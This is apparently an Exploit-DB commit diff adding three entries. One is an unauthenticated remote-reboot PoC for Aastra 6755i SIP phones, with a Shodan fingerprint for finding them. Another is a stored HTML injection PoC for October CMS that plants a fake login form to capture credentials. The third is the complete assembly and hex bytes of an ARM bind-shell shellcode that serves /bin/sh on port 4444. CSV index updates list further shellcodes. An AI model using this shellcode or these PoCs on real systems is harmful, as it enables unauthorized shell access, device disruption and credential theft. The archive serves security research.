DB: 2018-02-20

3 changes to exploits/shellcodes

Aastra 6755i SIP SP4 - Denial of Service

October CMS < 1.0.431 - Cross-Site Scripting

Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes)
Linux/x86 - shutdown -h now Shellcode (56 bytes)
Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes)
Linux/x86 - shutdown -h now Shellcode (56 bytes)

Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes)

Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)

Linux/x64 - shutdown -h now Shellcode (65 bytes)

Linux/ARM - Bind TCP (4444/TCP) Shell (/bin/sh)  + IP Controlled (192.168.1.190) + Null-Free Shellcode (168 bytes)

exploits/hardware/dos/44142.txt

@@ -0,0 +1,21 @@
+# Exploit Title:  Aastra 6755i SIP SP4 | Unauthorized Remote Reboot
+# Date: 17/02/2018
+# Exploit Author: Wadeek
+# Hardware Version: 6755i
+# Firmware Version: 3.3.1.4053 SP4
+# Vendor Homepage: http://www.aastra.sg/
+# Firmware Link: http://www.aastra.sg/cps/rde/aareddownload?file_id=6950-17778-_P32_XML&dsproject=www-aastra-sg&mtype=zip
+
+== Web Fingerprinting ==
+#===========================================
+:www.shodan.io: "Server: Aragorn" "WWW-Authenticate: Basic realm" "Mitel 6755i"
+#===========================================
+:Device image: /aastra.png (160x50)
+#===========================================
+:Crash dump, Firmware version, Firmware model,...: /crashlog.html
+#===========================================
+
+== PoC ==
+#================================================
+:Unauthorized Remote Reboot ("crash.cfg" file is created after): /confirm.html
+#================================================

exploits/php/webapps/44144.txt

@@ -0,0 +1,38 @@
+​​# Exploit Title: October CMS Stored Code Injection
+# Date: 16-02-2018
+# Exploit Author: Samrat Das
+# Contact: http://twitter.com/Samrat_Das93
+# Website: https://securitywarrior9.blogspot.in/
+# Vendor Homepage: *https://octobercms.com/ <https://octobercms.com/>*
+# Version: All versions till date from 1.0.431
+# CVE : CVE- 2018-7198
+# Category: WebApp CMS
+
+1. Description
+
+The application source code is coded in a way which allows malicious
+crafted HTML commands to be executed without input validation
+
+2. Proof of Concept
+
+1.  Visit the application
+2.  Visit the Add posts page
+3.  Goto edit function, add any html based payload and its gets stored and executed subsequently.
+
+Proof of Concept
+
+Steps to Reproduce:
+
+1. Create any HTML based payload such as:
+
+Username:<input type=text> <br>
+Password: <input type=text> <br>
+<button type="button">Login</button>
+
+2. This hosted page with form action implemented upon clicked by user will lead to exfiltration of credentials apart from performing a host of other actions such as stored xss and another similiar attacks.
+
+
+
+3. Solution:
+
+Implement through input validation to reject unsafe html input.

files_exploits.csv

@@ -5510,6 +5510,7 @@ id,file,description,date,author,type,platform,port
 44096,exploits/windows/dos/44096.txt,"Microsoft Edge - 'UnmapViewOfFile' ACG Bypass",2018-02-16,"Google Security Research",dos,windows,
 44099,exploits/multiple/dos/44099.txt,"JBoss Remoting 6.14.18 - Denial of Service",2018-02-16,"Frank Spierings",dos,multiple,
 44103,exploits/hardware/dos/44103.py,"Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < 4.25 - Denial of Service",2018-02-16,"M. Can Kurnaz",dos,hardware,50000
+44142,exploits/hardware/dos/44142.txt,"Aastra 6755i SIP SP4 - Denial of Service",2018-02-19,Wadeek,dos,hardware,
 41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware,
 41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows,
 41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows,
@@ -38133,6 +38134,7 @@ id,file,description,date,author,type,platform,port
 44138,exploits/php/webapps/44138.txt,"PHIMS - Hospital Management Information System - 'Password' SQL Injection",2018-02-16,L0RD,webapps,php,
 44140,exploits/php/webapps/44140.txt,"PSNews Website 1.0.0 - 'Keywords' SQL Injection",2018-02-16,L0RD,webapps,php,80
 44141,exploits/multiple/webapps/44141.txt,"Oracle Primavera P6 Enterprise Project Portfolio Management - HTTP Response Splitting",2018-02-16,"Marios Nicolaides",webapps,multiple,
+44144,exploits/php/webapps/44144.txt,"October CMS < 1.0.431 - Cross-Site Scripting",2018-02-19,"Samrat Das",webapps,php,
 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80

files_shellcodes.csv

@@ -732,8 +732,8 @@ id,file,description,date,author,type,platform
 43750,shellcodes/linux_x86/43750.asm,"Linux/x86 - Copy /etc/passwd to /tmp/outfile Shellcode (97 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
 43751,shellcodes/linux_x86/43751.asm,"Linux/x86 - shift-bit execve() Encoder Shellcode (114 bytes)",2009-01-01,"Shihao Song",shellcode,linux_x86
 43752,shellcodes/linux_x86/43752.asm,"Linux/x86 - execve() Using JMP-FSTENV Shellcode (67 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
-43753,shellcodes/linux_x86/43753.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes)",2014-06-22,"Osanda Malith Jayathissa",shellcode,linux_x86
-43754,shellcodes/linux_x86/43754.c,"Linux/x86 - shutdown -h now Shellcode (56 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86
+43753,shellcodes/linux_x86/43753.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes)",2014-06-22,"Osanda Malith",shellcode,linux_x86
+43754,shellcodes/linux_x86/43754.c,"Linux/x86 - shutdown -h now Shellcode (56 bytes)",2014-06-27,"Osanda Malith",shellcode,linux_x86
 43755,shellcodes/linux_x86/43755.c,"Linux/x86 - Bind TCP (1337/TCP) Shell Shellcode (89 bytes)",2014-07-13,"Julien Ahrens",shellcode,linux_x86
 43756,shellcodes/linux_x86/43756.c,"Linux/x86 - Reverse TCP (127.1.1.1:1337/TCP) Shell Shellcode (74 bytes)",2014-07-25,"Julien Ahrens",shellcode,linux_x86
 43757,shellcodes/linux_x86/43757.c,"Linux/x86 - setreuid() + execve(/usr/bin/python) Shellcode (54 bytes)",2014-05-08,"Ali Razmjoo",shellcode,linux_x86
@@ -806,7 +806,7 @@ id,file,description,date,author,type,platform
 43511,shellcodes/irix/43511.c,"IRIX - execve(/bin/sh) Shellcode (68 bytes)",2009-01-01,scut/teso,shellcode,irix
 43512,shellcodes/irix/43512.c,"IRIX - stdin-read Shellcode (40 bytes)",2009-01-01,scut/teso,shellcode,irix
 43520,shellcodes/arm/43520.c,"Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes)",2017-03-31,dummys,shellcode,arm
-43530,shellcodes/arm/43530.c,"Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes)",2015-03-02,"Osanda Malith Jayathissa",shellcode,arm
+43530,shellcodes/arm/43530.c,"Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes)",2015-03-02,"Osanda Malith",shellcode,arm
 43531,shellcodes/arm/43531.c,"Linux/ARM - chmod( /etc/passwd 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm
 43532,shellcodes/arm/43532.c,"Linux/ARM - creat(_/root/pwned__ 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm
 43533,shellcodes/arm/43533.c,"Linux/ARM - execve(_/bin/sh__ []_ [0 vars]) Shellcode (35 bytes)",2013-09-04,gunslinger_,shellcode,arm
@@ -821,11 +821,11 @@ id,file,description,date,author,type,platform
 43546,shellcodes/linux_sparc/43546.c,"Linux/SPARC - setreuid(0_0) + execve() Shellcode (72 bytes)",2009-01-01,"Michel Kaempf",shellcode,linux_sparc
 43549,shellcodes/linux_x86-64/43549.c,"Linux/x64 - Execute /bin/sh Shellcode (27 bytes)",2009-01-01,Dad_,shellcode,linux_x86-64
 43550,shellcodes/linux_x86-64/43550.c,"Linux/x64 - Execute /bin/sh Shellcode (24 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
-43551,shellcodes/linux_x86-64/43551.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64
+43551,shellcodes/linux_x86-64/43551.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith",shellcode,linux_x86-64
 43552,shellcodes/linux_x86-64/43552.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
 43553,shellcodes/linux_x86-64/43553.c,"Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
 43554,shellcodes/linux_x86-64/43554.c,"Linux/x64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64
-43555,shellcodes/linux_x86-64/43555.c,"Linux/x64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64
+43555,shellcodes/linux_x86-64/43555.c,"Linux/x64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith",shellcode,linux_x86-64
 43556,shellcodes/linux_x86-64/43556.asm,"Linux/x64 - shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
 43557,shellcodes/linux_x86-64/43557.asm,"Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
 43558,shellcodes/linux_x86-64/43558.asm,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64
@@ -843,6 +843,7 @@ id,file,description,date,author,type,platform
 43954,shellcodes/linux_x86-64/43954.nasm,"Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode",2017-12-16,0x4ndr3,shellcode,linux_x86-64
 43955,shellcodes/generator/43955.py,"Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator)",2017-12-19,0x4ndr3,shellcode,generator
 43956,shellcodes/linux_x86-64/43956.c,"Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode",2018-02-02,0x4ndr3,shellcode,linux_x86-64
+44143,shellcodes/arm/44143.s,"Linux/ARM - Bind TCP (4444/TCP) Shell (/bin/sh)  + IP Controlled (192.168.1.190) + Null-Free Shellcode (168 bytes)",2018-02-19,rtmcx,shellcode,arm
 42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
 41750,shellcodes/linux_x86-64/41750.asm,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64

shellcodes/arm/44143.s

@@ -0,0 +1,150 @@
+/*
+* Title:  Linux/ARM - IP Controlled Bind Shell TCP (/bin/sh). Null free shellcode (168 bytes)
+* Date:   2018-02-17
+* Tested: armv7l (Raspberry Pi v3) and armv6l (Raspberry Pi Zero W)
+* Author: rtmcx - twitter: @rtmcx 
+* Description:	The shellcode will only allow the connection to execute the shell if originating from the allowed IP.
+* 				Otherwise, the connection is dropped and the shellcode will wait for a new connection.
+*/
+
+.section .text
+
+.global _start
+_start:
+	/* Enter Thumb mode */
+	.ARM
+	add	r3, pc, #1
+	bx	r3
+
+	.THUMB
+	nop							// nop needed for address alignment
+
+/* Create a new socket*/
+	mov		r0, #2				// Add values for	
+	mov		r1, #1				// socket creation
+	eor		r2, r2, r2			// Zero out r2
+	mov 	r7, #200			// Put 281 in r7 ...
+	add		r7, #81				// ...in a 2-step fashion
+	svc		#1					// Execute syscall
+
+	/* The new socket will be returned in r0, which will be used later, i
+	   so save the new socket to another register (r4). */
+	mov	r4, r0					// Save socket in r4
+
+
+/* Bind socket */
+	adr 	r1, struct_addr		// address to string "1,1,1,1"
+	strb	r2, [r1, #1]		// replace to 0 for AF_INET
+ 	str 	r2, [r1, #4] 		// write 0.0.0.0 to r2
+	mov 	r2, #16				// address length str r2, [r1, #4] 
+	add 	r7, #1				// r7 already contains 281
+	svc 	#1					// Execute syscall
+
+
+/* Listen for connections */
+	mov 	r0, r4			// r4 has saved sock_fd
+	mov 	r1, #2			// Backlog value
+	add 	r7, #2			// r7 already contains 282
+	svc		#1
+
+
+/* Accept incomming connections */
+accept:
+	mov		r0, r4				// r4 has saved sock_fd
+	mov		r8, r4				// Save srv-socket in r8
+	eor		r5, r5, r5			// Get some NULLs
+	adr		r1, struct_client_addr  // Put address of struct_client in r1
+	strb	r5, [r1, #1]		// replace 0 for AF_INET
+	adr		r2, addr_len		// Address to variable for addr_len
+	add		r7, #1				// r7 already contains 284
+	svc		#1
+
+	mov		r4, r0				// save client_sock in r8 
+
+
+	/* Compare the clients ip against the allowed..*/
+	adr     r5, client_ip		// Save the address to the clients IP in r5
+	adr 	r1, allowed_ip		// Save the address to the allowed IP in r1
+
+	ldr     r3, [r1]			// Load the client IP value into r3
+	ldr     r2, [r5]			// Load one allowed IP value into r2
+
+	cmp		r2, r3				// compare the bytes
+	bne		close				// Not same, close the connection
+
+
+
+/* IP Address match */
+/* Duplicate STDIN, STDOUT and STERR*/
+	mov 	r0, r4				// Saved sockfd 
+	eor 	r1, r1, r1			// Zero r1 for STDIN
+	mov		r7, #63				// Syscall for dup2
+	svc 	#1					// Execute syscall
+
+	mov 	r0, r4				// Saved sockfd
+	add 	r1, #1				// STDOUT
+	svc		#1					// Execute syscall
+
+	mov 	r0, r4				// Saved sockfd
+	add 	r1, #1				// STDERR
+	svc		#1					// Execute syscall
+
+
+/* Execute shell */
+	adr 	r0, shellcode		// address to "/bin/sh"
+	eor	r1, r1, r1				// zero out r1
+	eor	r2, r2, r2				// and r2
+	strb	r2, [r0, #7]		// Replace 'X' with NULL
+	mov	r7, #11					// Syscall for execve
+	svc 	#1
+
+
+/* Close current connection (used if connection is from unallowed IP) */
+close: 
+	mov 	r0, r4				// Put saved client sockfd into r0
+	mov 	r7, #6				// Syscall number for "close"
+	svc 	#1					// Execute syscall
+
+	/* r7 now contains 6, so we must restore the value to 284 (accept will add 1 to get the correct value)*/
+	mov 	r7, #200			// Put 284 in r7 ...
+	add		r7, #84				// ...in a 2-step way
+	mov 	r4, r8				// Restore saved sock_fd to r4
+	b		accept				// After we closed the connection,
+								// wait for a new connection
+
+/* Structs and variables */
+
+struct_client_addr:
+	.ascii "\x02\xff"			// AF_INET 0xff will be NULLed 
+	.ascii "\x11\x11"			// Client port number
+client_ip:
+	.byte 2,2,2,2				// Client IP Address (8 byte)
+
+struct_addr:
+	.ascii "\x02\xff"			// AF_INET 0xff will be NULLed 
+	.ascii "\x11\x5c"			// Port number 4444 
+	.byte 1,1,1,1				// IP Address (8 byte)
+
+shellcode:
+	.ascii "/bin/shX"
+
+allowed_ip:
+	.ascii "\xc0\xa8\x01\xbe"	// The allowed IP (192.168.1.190)
+
+addr_len: 
+	.ascii "\x10\x10"			// accept() must have the length of the struct in a variable
+
+/*
+Compile and link with: 
+# as -o shellcode.o shellcode.s
+# ld -N shellcode.o -o shellcode
+
+\x01\x30\x8f\xe2\x13\xff\x2f\xe1\xc0\x46\x02\x20\x01\x21\x52\x40\xc8\x27\x51\x37\x01\xdf\x04\x1c
+\x1d\xa1\x4a\x70\x4a\x60\x10\x22\x01\x37\x01\xdf\x20\x1c\x02\x21\x02\x37\x01\xdf\x20\x1c\xa0\x46
+\x6d\x40\x15\xa1\x4d\x70\x1b\xa2\x01\x37\x01\xdf\x04\x1c\x5b\x40\x52\x40\x12\xa5\x16\xa1\x05\x26
+\x0b\x78\x2a\x78\x9a\x42\x14\xd1\x01\x35\x01\x31\x01\x3e\x01\x2e\xf6\xd1\x20\x1c\x49\x40\x3f\x27
+\x01\xdf\x20\x1c\x01\x31\x01\xdf\x20\x1c\x01\x31\x01\xdf\x0a\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27
+\x01\xdf\x20\x1c\x06\x27\x01\xdf\xc8\x27\x54\x37\x44\x46\xd1\xe7\x02\xff\x11\x5c\x02\x02\x02\x02
+\x02\xff\x11\x5c\x01\x01\x01\x01\x2f\x62\x69\x6e\x2f\x73\x68\x58\xc0\xa8\x01\xbe\x10\x10\xc0\x46
+
+*/